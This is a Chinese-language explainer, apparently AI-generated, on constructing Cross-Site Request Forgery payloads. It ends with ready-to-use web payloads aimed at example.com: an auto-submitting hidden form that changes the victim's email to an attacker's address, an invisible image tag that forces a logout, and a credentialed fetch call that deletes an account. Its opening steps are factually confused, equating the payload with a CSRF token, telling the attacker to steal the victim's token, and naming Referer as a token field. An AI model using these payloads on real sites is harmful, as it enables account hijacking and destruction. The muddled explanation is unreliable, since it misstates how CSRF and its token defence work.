CSRF payload 构造

CSRF (Cross-Site Request Forgery) 是一种常见的网络安全威胁，攻击者通过构造恶意链接或表单数据发送给用户，诱使其在不知情的情况下执行对网站的非法操作。为了构造一个有效的CSRF payload（也称为CSRF token），你需要了解以下几个步骤：

1. **获取CSRF Token**：首先，你需要从登录成功的请求中抓取服务器返回的CSRF令牌，它通常隐藏在`_csrf`、`X-CSRF-Token` 或 `Referer` 等字段中。

2. **模拟用户请求**：理解目标网站的正常操作流程，比如添加商品到购物车或者修改账户信息等，然后构造一个包含CSRF令牌的POST请求URL。这个URL应该和正常的用户交互URL相似，但多了额外的payload部分。

3. **构造Payload**：将CSRF令牌加入请求参数中，形成payload。这通常是JSON、GET参数、表单数据的一部分，取决于目标网站的API或HTML表单设置。

4. **触发请求**：将构建好的URL和payload发送给受害者，这可能通过电子邮件、即时消息或者直接展示在一个网页上让用户点击。当受害者按照链接或表单操作时，实际提交了含有CSRF令牌的请求。

相关问题

csrf的几种payload

### CSRF 攻击常用 Payload 形式

#### 表单提交类型的 CSRF Payload
对于基于表单提交的 CSRF 攻击，攻击者可以构建 HTML 表单来自动提交请求。这种技术利用了浏览器会自动附带 cookies 的特性。

<form action="https://example.com/change-email" method="POST">
    <input type="hidden" name="email" value="attacker@example.com"/>
</form>
<script>document.forms[0].submit();</script>

此代码片段创建了一个隐藏的 HTML 表单并立即通过 JavaScript 提交它[^2]。

#### 图像标签触发的 GET 请求型 CSRF Payload
图像标签通常用于发起简单的 GET 请求，在某些情况下可用于执行不需要复杂参数的操作：

<img src="https://example.com/logout" width="0" height="0" border="0"/>

这段代码尝试加载一个不存在或特殊的 URL 作为图片资源，实际上却触发了一次 HTTP GET 请求到服务器端点[^1]。

#### AJAX 或 Fetch API 发起的异步请求型 CSRF Payload
现代 Web 应用程序广泛采用 AJAX 技术来进行动态页面更新而无需刷新整个网页。因此，也可以使用这些方法构造更隐蔽复杂的 CSRF 攻击向量：

fetch('https://example.com/delete-account', {
  method: 'POST',
  credentials: 'include'
});

上述 JavaScript 使用 `fetch` 函数发送 POST 请求给指定的目标地址，并指示浏览器包含凭证信息（如 Cookies），从而实现无感知下的账户删除操作。